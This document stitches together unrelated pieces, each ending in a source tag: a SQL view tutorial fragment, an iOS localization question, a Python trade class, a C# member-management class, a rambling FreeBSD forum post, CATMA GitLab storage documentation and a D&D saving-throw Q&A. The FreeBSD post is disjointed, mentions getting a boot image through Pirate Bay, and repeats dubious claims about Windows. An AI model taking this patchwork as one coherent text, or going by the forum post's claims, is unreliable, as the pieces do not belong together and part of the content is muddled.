For the ENTRY_DAT1 variable, the Omit Leading Text is set to
AND ‘ (including the single quote) and the Omit Trailing Text is set to a single quote (
- Select File\Display Results, or press the Display Results button on the toolbar.
- In the Prompt window, notice the date prompts default to *OMIT (this is the same as *ALL). To run as is, press the OK button, but if you want to see the effect of the *OMIT with the leading and trailing values, use the drop-down calendar to select a date for the second date like so (don’t press OK):
This is a handy feature (only available in design mode): Press the Show SQL button to open the Merged SQL Statement window (below).
Notice how the first date is missing from the WHERE clause along with it’s leading and trailing values, and the second date has been replaced with a value. This is a useful way to see if the SQL syntax is correct before running or saving the view.
- Press the Close button and uncheck the second date value to return it to *OMIT like so:
Press the OK button to see results.
- Once satisfied with the changes to the view select File\Save or press the Save button to save the view.
|
OPCFW_CODE
|
I am localizing my iOS app, and in the Simulator it runs correctly in my chosen language every time.
When testing on my iPhone 5, it only detects the language properly the first time the app runs. Every other time I recompile and run my app on the device, it detects "en" as the language, even though I am testing with Español ("es") selected.
I detect the language using:
[[[NSBundle mainBundle] preferredLocalizations] objectAtIndex:0]
I've also used:
[[NSLocale preferredLanguages] objectAtIndex:0]
If I kill the app after the first run, and restart it on the device, it continues to detect the language properly.
But if I kill the app and then recompile/restart via Xcode after the initial run, it will load with "en" (English) detected instead.
After that, killing and re-starting the app continuously detects as English unless I delete the app completely, and recompile/reinstall/run the app via Xcode. The cycle then repeats... subsequent rebuild/restart without first deleting the app from the device results in misdetection.
All other apps on my device display with Spanish language the entire time. The entire UI shows in Spanish.
UPDATE: I've now tested on my iPad (3rd gen) also running iOS 6, and am experiencing the same behavior.
In didFinishLaunchingWithOptions, I have this code to detect language: (language is an NSString*):
language = [[NSLocale preferredLanguages] objectAtIndex:0];
Followed by this debugging statement, to compare the value I'm getting, as well as a slightly different way of detecting it, just for debugging:
NSLog(@"Detected language: %@ / %@", language, [[[NSBundle mainBundle] preferredLocalizations] objectAtIndex:0]);
The output shows as "Detected language: es / es" when the app works properly in Spanish mode, and then shows as "Detected language: en / en" when it doesn't. Still no idea why it decides to load as English sometimes...
UPDATE 4: I appreciate everybody's answers, and I've tried the various suggestions. Unfortunately I was unable to award the +100 bounty as none of the suggestions seemed to fix the issue. If someone does ultimate find a solution that works for me, I will award another +50 bounty to them at that time.
UPDATE 5: I have updated from Xcode 4.5 to 4.5.2, and experiencing this same issue.
UPDATE 6: I have now created a new test project from scratch, and it works perfectly fine! Obviously something must be wrong in the way my project is laid out, or perhaps in one of the data files. I guess my next journey will be to re-create the project from scratch, copying file data over one by one...
UPDATE 7 (MONTHS LATER): Sadly, I am again facing this issue after temporarily resolving it (seemingly) by painstakingly recreating my project. On first load, the language is correctly rendered, but on subsequent loads, it reverts back to English.
SOLVED See my final solution below. Thanks for the help everyone. I may dole out some of the bounty since it will go to waste anyway.
|
OPCFW_CODE
|
import structlog
class Trade(object):
def __init__(self, pair, current_price, amt_btc, uuid=None, stop_loss=None, client=None):
self.output = structlog.get_logger()
self.status = "OPEN"
self.pair = pair
self.entry_price = current_price
self.exit_price = None
self.amount = amt_btc / current_price
self.client = client
self.uuid = uuid
if stop_loss:
self.stop_loss = current_price * (1 - stop_loss)
else:
self.stop_loss = None
self.output.debug("Opened " + pair + " trade at " + str(self.entry_price) + ". Spent: " + str(amt_btc) + ", Amount:" + str(self.amount) + " " + pair.split('/')[0])
def close(self, current_price):
self.status = "CLOSED"
self.exit_price = current_price
btc_started = self.amount * self.entry_price
btc_ended = self.amount * self.exit_price
profit = btc_ended - btc_started
message_type = "\033[92m" if profit > 0 else "\033[91m"
self.output.debug(message_type + "Sold " + self.pair[:3] + " at " + str(self.exit_price) + ". Profit: " + str(profit) + ", Total BTC: " + str(btc_ended) + "\033[0m")
return profit, btc_ended
def tick(self, current_price):
if self.stop_loss and current_price < self.stop_loss:
return self.close(current_price)
return None
def show_trade(self):
trade_status = "Entry Price: "+str(self.entry_price) + " Status: " + str(self.status) + " Exit Price: " + str(self.exit_price)
if self.status == "CLOSED":
trade_status = trade_status + " Profit: "
if self.exit_price > self.entry_price:
trade_status = trade_status + "\033[92m"
else:
trade_status = trade_status + "\033[91m"
trade_status = trade_status + str(self.exit_price - self.entry_price) + "\033[0m"
self.output.debug(trade_status)
|
STACK_EDU
|
caf4926 wrote:You gave us some info earlier on your machine...
Can you tell us, is it a Box or Laptop?
You mention the graphics being Intel... Is that it... It's not Hybrid Intel + nvidia or other?
You are pushing this to a HDTV not a typical monitor? Not that this should be an issue, I booted Mint yesterday on my Sons Box that has a 32" HDTV and nvidia card without a hitch.
But I wonder if you could use a Monitor? Just to see.
Consider trying another mainstream distro, like: Fedora, openSUSE, just see if the behaviour is consistent.
Sorry. I meant to get back to this sooner.
It's a tower. I'm using the core i5 2500K's integrated graphics. I don't have another monitor for testing. Downloading Fedora right now. Will let you know how that works.
I did create a bootable USB stick of Mint 13 Mate using the dd command in Mountain Lion: same issue so that would rule out the optical drive being the issue.http://community.linuxmint.com/tutorial/view/744
I also found some boot parameters that people have claimed address similar issueshttp://ubuntu-tutorials.com/2010/05/06/ ... orkaround/viewtopic.php?f=59&t=113043
replace quiet splash with i915.modeset=0 (pulsing black screen)
replace quiet splash with i915.modeset=1 (bunch of errors culminating in an ATA bus error)
i915.915_enabled_rc6=0 quiet splash (black screen with white rectangle)
i915.915_enabled_fbc=0 quiet splash (black screen with white rectangle)
i915.semaphores=1 quiet splash (black screen with white rectangle)
I should say, I'm not sure if I entered the above parameters correctly or if there are any other parameters that might help?
Fedora worked. I didn't install it.... yet. I kind of still have my heart set on Mint. But the Fedora live CD definitely loaded without issue.
The distros that I have not been able to load include Mint 13 Cinnamon 64, Mint 13 Mate 64, Mint 14 Mate 64, Ubuntu 12.10, Mint Debian 201204
Perhaps this is what's going on? Intel Sandy Bridge compatibility issue with Ubuntu derivatives? That wouldn't explain the Debian distro not working thoughhttp://www.phoronix.com/scan.php?page=a ... orks&num=1
I have similar problem with intel DH61 with Intel HD in LM13 all DE ( Black screen white Rectangle ), but the problem is fixed in LM 14 ( i tried Mate version )
Maybe you can try check this post : viewtopic.php?f=59&t=113043
I know your mobo is same brand with different chipset but at least you can try it
Thanks for the suggestion. As reported above, I tried with the semaphores and rc6 parameters and no luck.
|
OPCFW_CODE
|
Responsibility when making claims about the license of a work
Imagine that some person X is running a website where they provide access to some creative work and claim that it is in the public domain, or under a permissive copyright license.
Imagine that Y retrieves the work and makes use of it in a way which is permitted by the license and would not be permitted otherwise. For instance, Y redistributes the work, sells it, translates it, etc.
Now, imagine that the work is actually not at all under this permissive license, and X's claim to that effect was wrong. Now, the actual copyright owner on the work, Z, notices Y's illegal use of their work, and sues them for copyright violation.
Can Y defend themselves by pointing out that they thought their use was permitted because of X's claim? Or are they fully responsible for their use of the work?
Could Y attack X for their false claim about the license of the work? If yes, to what extent would X be responsible?
Would it make a difference whether X was acting in good faith or not? E.g., maybe X really thought the work was under that license and were wrong, for instance because they had copied it from some other source with a wrong license claim. Or maybe X had not really made any effort to check the origin of the work, and they should have known that the license was not as indicated.
In the shoes of X, is there a way to distribute some creative work under a free license without promising that you have checked its copyright status carefully? E.g., say that you are allowing its use under a free license as far as you are concerned, but you don't promise that other parties like Z may not have a claim to it?
This last question is motivated by situations where a creator X takes a copyrighted work by Z, makes some derivative of it with an unclear copyright status (e.g., a mashup, parody, etc.), and wants to distribute it and say "I'd like to put it under a free license but I don't promise that Z doesn't have a valid copyright claim against reuse of the work." This is important because in many cases Z will leave X alone (e.g., because they are distributing the derivative work noncommercially) but could pursue some third-party Y if they started selling the derivative work by X.
Can Y defend themselves by pointing out that they thought their use was permitted because of X's claim?
No
Or are they fully responsible for their use of the work?
Yes
Could Y attack X for their false claim about the license of the work?
Yes, the torts of deceit and negligence spring to mind as do statutory prohibitions on deceptive and misleading conduct.
If yes, to what extent would X be responsible?
If they were guilty of deceit they would be liable for all of Y's losses. If they were negligent they would be responsible for all of Y's foreseeable losses.
Would it make a difference whether X was acting in good faith or not?
No
In the shoes of X, is there a way to distribute some creative work under a free license without promising that you have checked its copyright status carefully?
No. If X cannot verify that they have the right to offer a licence then they should not offer a licence.
Thanks! Does X have a way to avoid being guilty of deceit or negligence, etc., i.e., waiving all liability about their claim about the license of the work? Essentially I'm looking for a way for X to say "I'm not making any copyright claims about the work myself and as far as I'm concerned you can use it under the terms of this license, but I'm not making any promises about copyright interests that may be held by someone else."
@a3nm If you aren't willing to make any claim about the license of someone else's work, you almost certainly should not be redistributing it.
@Brandin: The idea is when you are distributing work which is based on someone else's, and you're not sure about the status of the original work or whether the right holders still have rights. Say I do a cover of a copyrighted song, or some art based on images found on the Internet with unclear copyright status, etc. I'd like to be able to say "my work is under license X as far as I'm concerned, but I don't know the legal situation about the original works I used". (Of course, if redistributing someone else's work verbatim, I agree with you.)
@a3nm if you don't know the copyright status then you cannot republish because you don't know if you are breaching copyright.
|
STACK_EXCHANGE
|
If the statically compiled code wants to access a variable in the kernel module code, must the module be compiled statically?
So I believe the kernel module code can use whatever in the statically compiled kernel code as long as they are exposed. But if the statically compiled kernel code wants to use a global variable in the module code, is that possible?
For example, we have a global variable called "int a " in one kernel module code(whatever loadable kernel module). In the statically compiled kernel code(e.g., in the /linux/sched/fair.c), I want to access that variable.
This will cause the compiling error since the modules are compiled at last(after the statically compiled kernel code is compiled) and are not loaded at beginning.
What if I first declare this variable in a statically compiled header file? But before the module is loaded, that variable will be meaningless.
Thanks,
Please add some code or make the question clearer.
Different solutions could be possible depending on what exactly you need. I assume you control at least the statically linked code and can change it if needed.
Way 1
If the statically linked code could export a function (something like set_my_good_var_ptr()), the dynamically loaded module could call that function to pass the address of the needed variable to the former.
Or, perhaps, the statically linked code could provide an interface that the dynamically loaded module could use to provide the get/set callbacks thus allowing to access the variable.
If all this is not suitable for your project (e.g. if you cannot change the code of the dynamically loaded module), the following might help, although I would not call it a good practice.
Way 2
Watch for the kernel module providing that variable to load (see register_module_notifier() function, for example).
Note that the notification function will be called after the module has loaded but before its initialization function is called.
When the notification function is called, you could use kallsyms_lookup_name() or kallsyms_on_each_symbol() to get the address of the variable you need.
This requires CONFIG_KALLSYMS and CONFIG_KALLSYMS_ALL to be set in the kernel configuration. If one or both these options are not set, it is still doable but somewhat more difficult (e.g. find the symbol in the binary file of the module, get the address of the ELF section the symbol belongs to and the offset in it and pass all this to your code, etc.)
After you have found the address of the variable, the statically linked code will have to determine somehow when the variable can actually be used (when it is initialized, etc.). How to do that depends on what the modules involved actually do, I can give no advice for that.
I think the kernel and any module are able to use find_symbol (defined in kernel/module.c) to discover the address of any other symbol in the kernel or any loaded module, statically compiled or not.
|
STACK_EXCHANGE
|
CATMA works locally on the Git projects. When you synchronize your CATMA Project you actually synchronize the local Git projects with their remote counterparts of the GitLab backend. That means before you access your data via Gitlab/Git you should always synchronize your CATMA Project within CATMA.
A CATMA Project is equivalent to a GitLab Group.
The CATMA ProjectID is equivalent to the GitLab Group name. The name and the description of your CATMA Project are stored in the GitLab Group description.
CATMA uses the user, role and permission management of GitLab. So if you are working with a team on your CATMA Project you will find all participating team members in the Members section of the corresponding GitLab Group.
If you have a CATMA account you can use the same credentials to log in to the GitLab backend (your username and password or your Google account).
A CATMA Project usually contains several resources. A resource can either be a Document, an Annotation Collection or a Tagset. All resources are modelled as GitLab/Git projects. A CATMA resource is a GitLab/Git project within the GitLab Group namespace. In order to avoid confusing a CATMA Project with a GitLab/Git resource project we will use those names throughout this article explicitly.
The Root GitLab/Git Project
You will find all your CATMA resources as GitLab/Git projects within your GitLab Group. There is one additional GitLab/Git project in the GitLab Group which is special: the root GitLab/Git project. Its name is a concatenation of the CATMA ProjectID and _root. Let’s assume you have a CATMA Project named Shakespeare with the ID CATMA_900F812B-69EF-4326-A3E6-58BCFF509719_Shakespeare. Then the root GitLab/Git Project would be named:
So what is this root GitLab/Git project all about? Changes to your resources, e.g. adding Annotations to a Collection, are all versioned within the GitLab/Git project that backs a CATMA resource. But what about changes to the structure of your CATMA Project that are made when you add or remove resources? Changes to this structure, the CATMA Project configuration so to speak, are recorded and versioned in the root GitLab/Git project. Luckily Git offers a standard way to manage such a configuration: git submodules. So all resources that are part of the current version of your CATMA Project are Git submodules of the root GitLab/Git project. We will come back to that later when I talk about how to actually work with your CATMA Project via Git. Note for now that CATMA versions your CATMA Project configuration with Git submodules.
When you add a resource to your CATMA Project it gets added as a GitLab/Git project to the GitLab Group and it gets added as a Git submodule to the root GitLab/Git project.
When you remove a resource from your CATMA Project it gets removed as a submodule from the root GitLab/Git project. It does not get removed as a GitLab/Git project from the GitLab Group automatically. So if you get back to older versions of your CATMA Project configurations the resources are still available.
The folder structure of the root GitLab/Git project is as follows:
Besides the .git folder with the Git management and configuration files there is also a .gitmodules file which maintains the list of Git submodules and a subfolder for each of the resource categories of a CATMA Project.
The Documents are all within the
documents folder of your root GitLab/Git project.
Each Document has its own folder named after the CATMA ID of the Document.
Each Document folder contains four files:
- header.json – contains metadata of Document
- CATMA_ID_orig.EXT – the original file that was uploaded with a format specific extension
- CATMA_ID.txt – the extracted text in UTF-8 plain/text
- CATMA_ID.json – the indexed types with the start, end and token offset of their tokens, i. e. the word list
The Extracted Text
The file with the extracted text in UTF-8 plain/text is the most important file as all start and end offsets of the Annotations can be resolved against the character offsets of the extracted text.
The Tagsets are all within the
tagsets folder of your root GitLab/Git project.
Each Tagset has its own folder named after the CATMA ID of the Tagset.
Each Tagset folder contains a
header.json file with some meta data like the Tagset’s name.
Remember a Tagset contains zero or more Tags that can form a hierarchical structure:
- A Tag has either no parent (top level Tag) or exactly one parent.
- A Tag can have zero or more child Tags.
Each Tag has its own folder named after the Tag’s CATMA ID.
Tag folders of Tags that have a parent Tag are located as subfolders of a folder named after the parent Tag’s ID.
This sounds more complicated than it is, because in the end each Tag is represented by a file named
propertydefs.json. To load the Tags of a Tagset you just need to parse all propertydefs.json files that can be found in the sub directories of the Tagset’s folder.
The propertydefs.json file contains:
- the name
- the ID, which is a UUID
- the parent ID, which is a UUID but can be empty in case of a top level Tag
- two system Properties:
- the author (catma_markupauthor)
- the color (catma_displaycolor)
The values of the system Properties are to be found in the property named
The color is encoded as an integer value containing red, green and blue values encoded as bits: red component in bits 16-23, the green component in bits 8-15, and the blue component in bits 0-7. This corresponds to the color encoding in HTML.
Besides the system Properties a Tag can have zero or more user defined Properties. Each Property has a name and a list of possible or proposal values (possibleValueList) that get presented to the user upon application of a Tag.
The Collections are all within the
collections folder of your root GitLab/Git project.
Each Collection has its own folder named after the CATMA ID of the Collection.
Each Collection folder contains a
header.json file with some meta data like the Collections’s name and the ID of the Document it belongs to (sourceDocumentId).
The Annotations are located in a subfolder called
annotations. Each Annotation has its own file named after the CATMA ID of the Annotation.
Annotations follow the Web Annotation Data Model and are serialized as JSON-LD.
Each Annotation has a type, i. e. its Tag, and one or more references to possibly non-adjacent (discontinuous markup) text segments. Each Annotation has a timestamp and an author (not to be confused with the author of the Tag). The Annotation inherits the color, the name and the user defined Properties from its Tag. A user defined Property of an Annotation can have zero or more values which are either drawn from the set of possible values of the Tag or defined by the user while annotating (ad-hoc values).
Within the Annotation’s file you’ll find a body section with the following subsections:
- tagset – the URL of the Tagset GitLab/Git project. This URL also contains the ID of the Tagset.
- tag – the URL of the Tag GitLab/Git project. This URL also contains the ID of the Tag.
- properties – The Properties and their Annotation specific values:
- system – timestamp and author of the Annotation
- user – user defined Properties with the CATMA ID and a list of values for each Property
- target – contains a list of TextPositionSelector selectors with start and end offsets that reference the aforementioned UTF-8 plain/text file with the extracted text
Working with Git
The GitLab backend is accessible at git.catma.de. Once you’ve logged in with your CATMA account credentials (or your Google account) you can access your settings in the upper right corner. On the settings page you will find in the menu on the left the Access Tokens menu item.
Add a Personal Access Token with the ‘api’ scope enabled.
Make sure you copy the token right after creation and put it somewhere safe. You won’t be able to see the token itself after you leave the page!
Before you start please make sure that your local installation of Git has the right setting for the handling of line endings. The value of
core.autocrlf needs to be set to
false. You can check the value with:
git config --global --get core.autocrlf
If it doesn’t print anything out then it defaults to
false. You can set the value with
git config --global core.autocrlf false
Note that it is also possible to set this value per Git repository or on the system level. Just make sure that it is set to
false for all CATMA Git repositories/projects!
Now you can work with the GitLab API.
For example to get a list of all of your CATMA Projects:
or with the parameter
GROUPID_OR_NAME set to the CATMA Project ID to get a list of all the resource GitLab/Git projects and the root GitLab/Git project:
Taking the Git URL of the corresponding root GitLab/Git project you can also work with Git directly to clone a CATMA Project. Assuming the abovementioned Shakespeare CATMA Project the command would look like this:
git clone --recurse-submodules
Use the created access token as username and password. Alternatively you can also add an SSH key to your account and clone with SSH.
All you need is the URL of the root GitLab/Git repository. The resources of the current version get initialized automatically by the
You can use the cloned repository for backup purposes or to integrate external systems. However, be aware that CATMA can handle only a certain amount of complexity when resolving merge conflicts. You should therefore always resolve conflicts on your side.
CATMA always works on a local-only
dev branch. Changes get merged into the local
master branch. When synchronizing a CATMA Project the local
master branches of the resource Git projects and of the root Git project get merged with their remote GitLab counter parts.
Note that you should take care to stick to the abovementioned folder and file structures and formats to avoid errors.
|
OPCFW_CODE
|
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
using TimeTrack.Core;
using TimeTrack.Core.Model;
namespace TimeTrack.UseCase
{
public class MemberUseCase
{
private TimeTrackDbContext _context;
public MemberUseCase(TimeTrackDbContext context)
{
_context = context;
}
public async Task<UseCaseResult<MemberEntity>> GetAllAsync()
{
var r = await _context.Members.ToListAsync();
return UseCaseResult<MemberEntity>.Success(r);
}
public async Task<UseCaseResult<MemberEntity>> GetSingleAsync(int id)
{
var r = await _context.Members.SingleOrDefaultAsync(x => x.Id == id);
if (r == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new { Id = id });
}
return UseCaseResult<MemberEntity>.Success(r);
}
public async Task<UseCaseResult<MemberEntity>> SetPassword(int id, string password)
{
var member = await _context.Members.SingleOrDefaultAsync(x => x.Id == id);
if (member == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new
{
Message="Das Mitglied existiert nicht."
});
}
member.SetPassword(password);
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(member);
}
public async Task<UseCaseResult<MemberEntity>> PutSingleAsync(MemberEntity member)
{
if (member == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Das Mitglied ist fehlerhaft!"
});
}
if (string.IsNullOrWhiteSpace(member.Mail))
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Die E-Mail fehlt!"
});
}
if (member.Mail.Length > 320)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Die E-Mail ist zu lang!"
});
}
if (await _context.Members.AnyAsync(x => x.Mail == member.Mail))
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Die E-Mail wird schon verwendet!"
});
}
await _context.Members.AddAsync(member);
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(member);
}
public async Task<UseCaseResult<MemberEntity>> DeleteSingleAsync(int id)
{
var r = await _context.Members.Include(x => x.Activities).SingleOrDefaultAsync(x => x.Id == id);
if (r == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new { ID = id });
}
_context.Activities.RemoveRange(r.Activities);
_context.Members.Remove(r);
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(r);
}
public async Task<UseCaseResult<MemberEntity>> UpdateSingleAsync(int id, MemberEntity member)
{
if (member == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Das Mitglied ist fehlerhaft!"
});
}
var m = await _context.Members.SingleOrDefaultAsync(x => x.Id == id);
if (m == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new { Id = id });
}
m.Surname = member.Surname;
m.GivenName = member.GivenName;
m.Mail = member.Mail;
m.Active = member.Active;
m.MailConfirmed = member.MailConfirmed;
m.RenewPassword = member.RenewPassword;
m.Created = member.Created;
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(m);
}
}
}
|
STACK_EDU
|
Cencorship, as pericunaere curses in the win$ section, so there's some big brother filtering the ""ncurses.tgz" g marking as [deleted].
sorry for late reply, but let's change to another topic afterwards.
I precompiled a NO-DEBUG kernel from /usr/src as uname -a:
FreeBSD freeBSD-CURRENT 13.0-CURRENT FreeBSD 13.0-CURRENT #5 r368997: Tue Jan 12 13:46:33 CET 2021 lizbeth@freeBSD-CURRENT:/usr/obj/usr/src/amd64.amd64/sys/LIZBETH amd64
whenever I do a
svn up /usr/src
svn: warning: cannot set LC_CTYPE locale
svn: warning: environment variable LANG is de_AT
svn: warning: please check that your locale name is correct
At revision 369021.
So, if someone is interested in daily projecting here, please take you the time and read further:
no output of changes but I wanna know where is being worked at the moment and on which architecture.
Colleges of netBSD having troubles to compile the rasperry pi 4 (armhf) for instance, same as the IoT-thing (needs two sd-cards and openBSD *.fs boot the kernel here but don't find root partition afterwards physically, in virtualization (on writeable .ISO and not an .IMG for the USB) but I get 'broken library c++' on both i386 and amd64 images when tryingto install a DM or even a XFCE-desktop (there it is: pkg_add -uvi for updating the system)at the runtime of the whole graphical environment, pitty, pitty...
NetBSD is good in a movement what XEN-development concerns and freeBSD shoulda be glad to have someone to introduce the virtualization kernel into the main construct of booting (as primary before the usual -CURRENTS flews out). Problems to be corrected in email@example.com discussion concerning an UIMMU issue or so quite similar, forgotten at the moment, hopefully not the age of the PC... but XEN and BIOS does good together, UEFI is much more trickier, Haiku OS boots nearly every MBR but needs an extra image for UEFI boots. They had something where my old BTX-eyes looked like a car g: a 1920x1280 screen but with blue sparkeling line on the upper side (costs probably the same amount of electricity like BTC-mining, which is normally simply a fraud, tried to bet as I felt tired and looked for adrenaline, lost 7 bucks, but it is the future!). Every kernel does a lot of crypto like camelia, heimdal, sha512, gzip compression and anti-theft-virus-security options and it's I guess about 10% of booting progress. ACPIs are not standarized, this is what mobile customs lack and leads to the many differnent "just for thie one android" builds and make a spreading of a CUSTOM difficult. Who's really done this, is lineage OS and pixel OS, all others are depending on the device and the making date of the device sometimes.
So we get Amadrillis-GPUs on Flint OS, Fuchsia OS, Fyde OS and the upcoming generation of mobile systems. If google will hold on hands of this any longer, with the kern for android they heard on us to make it open-source, this is why I never got problems with android but with the monopol-diseaster at the OS-market. And iOS is to much unpersonal, expensive and not even rootable. So the pinephone with KDE Neon and Plasma is the only alternative at the moment.
In the meantime I re-compiled the 'HYPERVISOR hv' into the kern again (thrown out because of being Hyper, to be treated with Ritalin), but still slow in scraping between VM and host and saving a snapshot and so on with family-own VMs but also as /opts like osX (old and rare).
plasma5 and xfce4 updates were well done; I have now the comic-sign of a certain comic on the desktop; the ability of live-3D-backgrounds grows and plasma itself. Playing with thoughts of a Pinephone but not being flash and setup myself = half the joy and 200$, hmmm, poor, poor girl. I had the Ubuntu phone and it was really amazing but after two months the akku was dead suddenly.
The best thing I remembered was when Gates told us that there will never be a Windows 11, only new build-numbers, I thoughta, maybe the whole star is sinking, who knows? 30 years for a computer system is a whole epoché in computer-ages and bill is became older now and a bit more moderate, maybe I have no consequences for the upcoming anymore. I well remember the phase when I couldn't see a windows desktop on official companies, government, etc., and thought an slavery and school and things like this.
I have now freeBSD 13 on daily use and as main system for my notebook, being once again adopted with a new accumulator after 6 years of 24/7; got it at the age of 5, thrown out of the M$ imperia as too old (what windows eats on memory is really a resource-killer; OS-ware is small and intelligent in kernel as well as on all other runlevels, but doens't get always the X immediately, I use the DRM-driver but modesetting as the DRM flickers, getting some graphic errors sometimes. ), and then "her" life started to grow, doing a BIOS update now for weeks, but need a windows boot USB, that for us is a doesn't-work-without thing.
To avoid getting win (version: whatever) on the physical SSD (but no UEFI still?), I tried a lotta things and apps. The Windows USB creator or Rufus or an .APX for the brandmarked "windows to go" (no evaluation versions possible).
One USB-Stick was to slow and badly conecpted, leading to waiting times for 15 hours I gave up; the other stick now contains the "Hiren's Boot CD", also known as a variant of the Windows PE; suddenly not anymore being able to be downloaded (download of file simply doesn't start, tried on 8 servers) since August 2020; typically MS, I thoughta;
so pirate-bay helped out a bit, not being illegal but has it's grey circles sourroundings. My experience shown me that using a simple thing like a squash-fs is beeing made over a .VMDK virtual image, but our Virtualbox has no extension pack (and it isn't planed I guess because of xen-develpment (frequent) but I think the standard bhyve-hypervisor is on the way to loose finally in comparision to KVM.
....... so USB can't be used, as protocol 1.1 isn't supported since Vista anymore in Virtual Box. So I used linux on a USB stick for writing down with extension pack, but windows sign arrived, but no turning round of "hour glass" after kernel boot or a blank screen from beginning onwards.
I manually copied the important files and the "install.wim" (these were times were they had .CAB files for the sets), so it was a simply small pick-nick with an old enemy. You have to unpack the .zip to .iso and then make a virtual machine on an USB stick (you need two, one for linux distro and host like MX linux or antiX that is small and bring it to ''dd', then add - under debian or ubuntu - the program WOEUSB (woeusbgui), look if the other stick, where the PE should arrive isn't mounted (automounter!), write the image down with the proggie, that fascinates me, btw., then there's some active-making (attr. 'a' on fdisk) with guess now --- grub --- and the whole thing boots, well done, seeding torrent on ktorrent at the moment.
so if someone can help to let my machine show again updated files on the console, please don't hesitate to answer. Another problem: how do we call the thread here now? Admin should do but not deleting my loooooong post here, plz.
Thx a lotta for a good and running and old and wise system, dear kernel-inventor,
|
OPCFW_CODE
|
Why is there a saving throw for each ability score?
From reading the current preview of the "Basic Rules" it looks like each ability score is now granted the possibility of being connected to a Saving Throw. In fact, certain classes get proficiency with a saves against a given attribute, such as a Fighter getting proficiency in saves for STR and CON. So instead of Reflex/Fort/Will saves, we have a save for each ability score.
At first glance, I really like this idea. A spell should clearly be able to be "defended" by something other than just DEX/CON/WIS.
However, I looked through the existing spell list and all of spells use only DEX/CON/WIS for saves.
What's going on here? Is this on purpose? Is this an oversight?
Why give Fighters proficiency in STR saves and then not print a single spell that uses that stat? (Note that Web appears to allow an STR "check" but not an STR "save" to escape, though this may be a mistake.)
My driver for this question was the oddity of inventing STR saves or INT saves and then not printing a single spell in the Basic set that used them. Based on the answers below, there are spells printed in the "playtest" set that do use these saves. So there is some reference material for what should be a STR save.
However, the answers below have even more and better information.
I'm voting to close this question as off-topic because designer-reasons questions are no longer allowed on RPG.SE.
Six saving throws instead of three is by design, intended to emphasize the ability scores, and new usages are likely to come up in future expansions.
Why
Associating saving throws with ability scores makes the scores more relevant, or at least come up a lot more often.
It has been six saving throws since the first playtest rules.
Quoting the transcript of an early seminar back in 2012:
Monte: We wanted to distill down the essence of D&D. We wanted to make sure that the ability scores and their modifiers had a big influence.
(...)
A couple of days ago I talked a little bit about how we want the core mechanic of the game to be the interaction between the DM and the player. And one of the great tools for that is the ability score.
(...)
Monte: Making a saving throw against something has become something that’s really a part of D&D.
So again, what we’ve done is tie those into the ability scores.
It has other benefits, such as less terms to learn or more varied defense.
But the main reason to deviate from 3e and 4e, despite the costs, is likely for the reason quoted above.
Where
The playtest had spells that are not included in Basic, and among them you can find uses for the other three saving throws.
For example, Gust of Wind requires a Strength save, while Banishment and Holy Word ask for a Charisma save.
Apart from spells, monsters' abilities also call for saving throws.
For example, in the playtest the Mind Flayer's Mind Blast calls for an Intelligence saving throw from each victim.
Or the Water Elemental, when it pushes you, forces you to make a Strength saving throw.
Monsters are not included in Basic for the moment, but should be in the future.
There are also rumours that Intelligence saving throws will be used for psionics, which Mike Mearls appears to substantiate on Twitter:
The Snark Knight: @mikemearls What would be examples of Strength, Intelligence, or Charisma saving throws?
Mike Mearls: @SnarkKnight1 Strength save - resist a gust of wind or push effect
Mike Mearls: @SnarkKnight1 Int save - psionics when we do it
Mike Mearls: @SnarkKnight1 charisma - possession
Mike Mearls: @SnarkKnight1 I think this is an area where we will see more as designers get more used to the edition
Thank you, did not see playtest version, it's good to know they did print something that used them.
The stats for the wolf in the starter set use a Strength Save against being tripped, if I remember my session this weekend properly.
This isn't an oversight. Spells aren't the only thing that could possibly cause a saving throw.
Saving throws are written to be generally applicable, so that they can cover every possible situation and future rule. This provided a solid foundation upon which both official rules and home rulings can build, as it provides for making saving throws against any kind of effect imaginable.
There is a series of Mearls tweets from the past few days that indicate what the 3 that aren't currently used are good for: https://twitter.com/mikemearls/status/491048296983449601 https://twitter.com/mikemearls/status/491048177739382784 https://twitter.com/mikemearls/status/491048382748577792
The “why” is because there are indeed spells which target the other 3 saves.
There are many spells/attacks which target the 3 common saves (each class gets one): Con, Dex, Wis. There are very few spells which target the uncommon saves (each class also gets one of these too): Str, Int, Cha. I put together a list from the PHB and XGtE that I could find. I probably missed a few, but I wanted to share this effort for anyone interested (feel free to add spells to this list - probably better to keep monster attacks unspoiled). Note that some of these spells might have multiple effects. If any of them belonged on the lists, I included the spell.
Strength (push, pull)
Gust (XGtE, cantrip)
Ensnaring Strike (1)
Entangle (1)
Earthbind (XGtE, 2)
Gust of Wind (2)
Maximilian's Earthen Grasp (XGtE, 2)
Wind Wall (3)
Watery Sphere (XGtE, 4)
Wrath of Nature (XGtE, 5)
Telekinesis (5)
Tsunami (8)
Intelligence (psychic)
Phantasmal Force (2)
Synaptic Statis (XGtE, 5)
Mental Prison (XGtE, 6)
Feeblemind (8)
Illusory Dragon (XGtE, 8)
Psychic Scream (XGtE, 9)
Charisma (personality, appearance, soul, banishment)
Bane (1)
Zone of Truth (2)
Banishment (4)
Hallow (5)
Planar Binding (5)
Seeming (5)
Magic Jar (6)
Plane Shift (7)
Temple of the Gods (XGtE, 7)
Despite Mike Mearls's comment noted in another answer, all of the charm/domination spells appear to target Wisdom. Charisma appears to only be used when something targets the very ego/soul/appearance of a being. I'm not sure why Polymorph would be Wisdom though. There might also be some balancing going on as well that is a more important criteria than the flavor.
|
STACK_EXCHANGE
|
